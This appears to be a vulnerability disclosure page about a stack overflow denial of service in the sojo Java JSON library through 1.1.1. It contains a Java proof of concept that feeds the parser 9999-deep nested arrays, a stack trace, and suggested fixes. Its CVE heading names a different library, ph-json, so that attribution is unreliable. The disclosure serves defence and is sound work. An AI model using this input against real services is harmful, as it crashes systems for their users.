    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34612: Stack overflow error caused by ph-json parsing of untrusted JSON String · Issue #35 · phax/ph-commons

An issue was discovered sojo thru 1.1.1 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by sojo parsing of untrusted JSON String****Description**

Using sojo to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_scan_token(JsonParserGenerate.java:503)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_4(JsonParserGenerate.java:344)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_3(JsonParserGenerate.java:374)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:351)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_6(JsonParserGenerate.java:313)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_6(JsonParserGenerate.java:258)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:357)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_2_13(JsonParserGenerate.java:252)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:144)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
    
    

**PoC**

        <dependency\>
            <groupId\>net.sf.sojo</groupId\>
            <artifactId\>sojo</artifactId\>
            <version\>1.1.1</version\>
        </dependency\>

import net.sf.sojo.interchange.json.JsonParser;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonParser parser = new JsonParser();
        parser.parse(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

Tag

#java